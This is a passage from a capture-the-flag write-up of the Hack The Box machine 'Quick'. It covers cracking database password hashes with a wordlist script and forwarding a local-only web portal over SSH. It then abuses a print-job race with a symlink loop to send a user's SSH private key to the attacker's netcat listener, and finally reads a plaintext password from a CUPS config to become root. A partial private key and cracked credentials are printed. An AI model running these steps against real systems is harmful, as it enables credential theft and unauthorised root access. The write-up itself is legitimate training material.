                        $result = $stmt->get_result();
                        if($result->num_rows > 0)
                        {
                                $row = $result->fetch_assoc();
                                $ip = $row["ip"];
                                $port=$row["port"];
                                $fp = fsockopen($ip,$port,$errno, $errstr, 20);
                                if(is_resource($fp))
                                {
                                        $message='Printer is up. Please add a <a href="job.php?title='.$title.'">job</a>';
                                }
                                else
                                {
                                        $error = "Can't connect to the printer";
                                }
                        }
                }
        }

?><!DOCTYPE html>
[...]


This page list the available printers and delete it if requested.

sam@quick:/var/www/printer$ cat job.php 
<?php
require __DIR__ . '/escpos-php/vendor/autoload.php';
use Mike42\Escpos\PrintConnectors\NetworkPrintConnector;
use Mike42\Escpos\Printer;
include("db.php");
session_start();

if($_SESSION["loggedin"])
{
        if(isset($_POST["submit"]))
        {
                $title=$_POST["title"];
                $file = date("Y-m-d_H:i:s");
                file_put_contents("/var/www/jobs/".$file,$_POST["desc"]);
                chmod("/var/www/printer/jobs/".$file,"0777");
                $stmt=$conn->prepare("select ip,port from jobs");
                $stmt->execute();
                $result=$stmt->get_result();
                if($result->num_rows > 0)
                {
                        $row=$result->fetch_assoc();
                        $ip=$row["ip"];
                        $port=$row["port"];
                        try
                        {
                                $connector = new NetworkPrintConnector($ip,$port);
                                sleep(0.5); //Buffer for socket check
                                $printer = new Printer($connector);
                                $printer -> text(file_get_contents("/var/www/jobs/".$file));
                                $printer -> cut();
                                $printer -> close();
                                $message="Job assigned";
                                unlink("/var/www/jobs/".$file);
                        }
                        catch(Exception $error) 
                        {
                                $error="Can't connect to printer.";
                                unlink("/var/www/jobs/".$file);
                        }
                }
                else
                {
                        $error="Couldn't find printer.";
                }
        }


?><!DOCTYPE html>


But this is the really interesting file; it seems that it connects to a network printer and send the specified message to it. I start to have an idea about how to use it, but I have to understand if the privileges of the user that run this portal can reach the file I need. I don't know how to proceed, but I'm quite sure that I have to retrieve the credential of the user srvadm:

sam@quick:/var/www/printer$ id srvadm
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)


That printer group seems to be interesting. But for now, the only new information that I have is the database credentials (I tried that password with other users, but doesn't work), so, look inside the DB.

https://dev.mysql.com/doc/refman/8.0/en/mysql.html

sam@quick:/home/srvadm$ mysql --user=db_adm --password quick
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 61
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.00 sec)

mysql> show full tables;
+-----------------+------------+
| Tables_in_quick | Table_type |
+-----------------+------------+
| jobs            | BASE TABLE |
| tickets         | BASE TABLE |
| users           | BASE TABLE |
+-----------------+------------+
3 rows in set (0.00 sec)

mysql> select * from users;
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+
2 rows in set (0.00 sec)


Ok, to reverse this, I have to use the code found on the login.php file with a brute-force, but I think that the standard tools cannot be useful in this case (probably I mistake), so proceed for another way:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ cat /usr/share/wordlists/rockyou.txt | while read in; do php -r "print ((md5(crypt(trim('$in'),'fa'))=='e626d51f8fbfd1124fdea88396c35d05') ? 'password found: '.\"\r\n\".'$in'.\"\r\n\" : '');"; done
PHP Parse error:  syntax error, unexpected ''),'' (T_CONSTANT_ENCAPSED_STRING), expecting ')' in Command line code on line 1
PHP Parse error:  syntax error, unexpected 'fa' (T_STRING), expecting ')' in Command line code on line 1
PHP Parse error:  syntax error, unexpected 'aime' (T_STRING), expecting ')' in Command line code on line 1
PHP Parse error:  syntax error, unexpected 'sgirl' (T_STRING), expecting ')' in Command line code on line 1
PHP Parse error:  syntax error, unexpected 'fa' (T_STRING), expecting ')' in Command line code on line 1


Nice, it seems to work, but, after about half an hour, the script is running again, and I feel that it run for a long time again. So, I cannot wait and I try for another way and generate a php script, hoping to be fastest (in the meantime the script continue to run, it could be finish).

<?php
$dictionary = fopen("/usr/share/wordlists/rockyou.txt", "r");
while ($pwd = fgets($dictionary))
{
        $searchingFor = "e626d51f8fbfd1124fdea88396c35d05";
        $passwordHash = md5(crypt(trim($pwd),'fa')); 
        if($passwordHash == $searchingFor)
        {
                echo "Password found: ".$pwd;
        } 
}
fclose($dictionary);
echo "Brute-force completed!!!";
?> 


And running it the result is quite immediate:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/bruteforce$ php bforce.php 
Password found: yl51pbx


Now, I tried this password on ssh, logging on the portal (but strange, I logged in as elisa, probably some other guys are modifing the database) and I try to the user srvadm locally (su srvadm), but nothing was right. I understand that I have to use this credential on the hidden portal, but I have to understand where the portal answers. Unfortunately, I cannot find the calassi file used by apache to configure the portals (like /etc/httpd and so on). Anyway, I know that this path has to be configured in some file, to instruct apache to use it, so, I proceed with a task that could be really long, but fortunately it was not so.

sam@quick:/$ grep -r "/var/www/printer" * 2>&-
etc/apache2/sites-available/000-default.conf:   DocumentRoot /var/www/printer
^C
sam@quick:/$ cat etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>
<VirtualHost *:80>
        AssignUserId srvadm srvadm
        ServerName printerv2.quick.htb
        DocumentRoot /var/www/printer
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet


Good, reading inside I understand that there's a VirtualHost configured and it can be reached only locally (port 80 is not exposed, if you remember). So it came back to me another box where i forward the remote port on my local machine: servmon (heres the link if you want to give a look to it and read the article).

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ sudo ssh -i id_rsa sam@10.10.10.186 -L 80:127.0.0.1:80
The authenticity of host '10.10.10.186 (10.10.10.186)' can't be established.
ECDSA key fingerprint is SHA256:kEX5biAHQdV0la1P6VUH52+0TprzbPr+r0UfSni9aRk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.186' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 19 09:02:21 UTC 2020

  System load:  0.0                Users logged in:                1
  Usage of /:   32.3% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 36%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    140


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Jul 19 09:01:05 2020 from 10.10.14.145
sam@quick:~$ 


In the meantime, someone changed the password in the database... nice... why haven't I thought of this before?

sam@quick:/tmp/not-this$ mysql --user=db_adm --password quick
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 10980
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select * from users;
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | c6c35ae1f3cb19438e0199cfa72a9d9d |
+--------------+------------------+----------------------------------+
2 rows in set (0.01 sec)


Anyway, the portal is now available on my localhost and I can login.

First of all, I add a printer specifing my ip address, so I can receive the document that will be sent to that printer. Then, come back on the code, if you remember, when you launch a print job the page saves a file with the date and time on the jobs folder in the /var/www, fills it with the description of the job and sends it to the printer you specified. Now, I have to intercept the creation of that file and replace it with a linker to a file I like (for example the root.txt flag that I'm trying to reach, but... I suppose the user who launch the portal doesn't have the right privileges, so, I try for other files, like the private key of the srvadm user... grant it to me... sometimes we have to guess).

sam@quick:/var/www/jobs$ while [ true ]; do for f in *; do rm -f "$f" && ln -s /home/srvadm/.ssh/id_rsa $f; done; done


This command cycle on the folder for each file is created and replace it with the link to the id_rsa on the .ssh folder of the srvadm user.

Next step is to go to the page where the printers are listed, chose the printer with your IP address (take the listener active on your machine on the specified port, the page will be try to connect to ensure the printer is available, after the connection will be closed, launch again the listener and go ahead) and launch finally launch the print task; if all is well configured, the script will replace the file with the link and you'll receive the id_rsa file on your listener:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ nc -nvlp 9100
listening on [any] 9100 ...
connect to [10.10.14.145] from (UNKNOWN) [10.10.10.186] 52752
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
[...]
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----
VAin7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ 


And a shell with the srvadm privileges is now available:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ ssh -i id_rsa_srv srvadm@10.10.10.186
load pubkey "id_rsa_srv": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 19 11:40:02 UTC 2020

  System load:  0.0                Users logged in:                1
  Usage of /:   30.1% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 16%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    133


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Mar 20 05:56:02 2020 from 172.16.118.129
srvadm@quick:~$ 


Now, I lost a lot of time, because, I launched linpeas.sh, lse.sh, again. I turn around for the folder searching something that can be useful to me, but find nothing. Finally, in one last desperate attempt, based on the group to which the user belongs (printers), I tried to look for something that was relevant:

srvadm@quick:~$ locate printers
/home/srvadm/.cache/conf.d/printers.conf
/snap/core/8689/usr/share/gcc-5/python/libstdcxx/v6/printers.py
/usr/share/gcc-8/python/libstdcxx/v6/printers.py
/var/www/printer/printers.php

srvadm@quick:~$ cat /home/srvadm/.cache/conf.d/printers.conf
# Printer configuration file for CUPS v2.3.0
# Written by cupsd on 2020-02-18 17:11
# DO NOT EDIT THIS FILE WHEN CUPSD IS RUNNING
NextPrinterId 5
<Printer Aviatar>
PrinterId 1
[...]
MakeModel KONICA MINOLTA C554SeriesPS(P)
DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
State Idle
[...]
Location Gb125
MakeModel KONICA MINOLTA C554SeriesPS(P)
DeviceURI ipp://127.0.0.1/ipp/pa-7032
State Idle
[...]


Anyway, go ahead. In the file I found an url, where inside are specified the credential for the servadm user, it seem to be "&ftQ4K3SGde8?". Well, let me try to impersonate the root user, using this password.

srvadm@quick:~$ su root
Password: 
root@quick:/home/srvadm# cat /root/root.txt 
c******************************f


Wooo... it was a long job, but we did it! This BOX took many days of work. Thanks for reading.

The awesome image used in this article is called Pig Truck and was created by VAGO.